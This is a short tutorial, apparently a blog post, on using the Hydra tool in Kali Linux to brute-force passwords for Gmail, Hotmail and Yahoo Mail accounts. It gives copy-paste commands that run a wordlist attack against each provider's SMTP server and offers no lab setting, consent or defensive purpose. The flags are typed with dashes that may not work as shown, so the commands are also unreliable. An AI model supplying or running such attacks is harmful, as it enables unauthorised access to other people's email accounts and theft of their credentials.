In this post we will use Hydra to bruteforce attack on Gmail. Hydra is pre installed in Kali linux, and in Backtrack too. A Bruteforce attack with hydr , tries every combination of password. You can set your own wordlist to use.

Fire up Your Kali Linux and open Hydra
if you don’t have kali linux installed in your machine then no need to worry you can follow this tutorial cos kali is hacker’s best friend ever. Another way is you can install hydra in windows too. You can watch this video too
- to open hydra go to
Applications> Kali Linux > Password Attacks > Online Attacks > Hydra
Type These commands in hydra
You need to brush up your linux commands. just copy the commands in hydra.
Before start paste a wordlist in Kali linux desktop
- Gmail
hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 465 smtp.gmail.com smtp
- Hotmail
hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 587 smtp.live.com smtp
- Yahoomail
hydra –S –l Email –P /root/Desktop/Wordlist.txt –e ns –V –s 587 smtp.mail.yahoo.com smtp
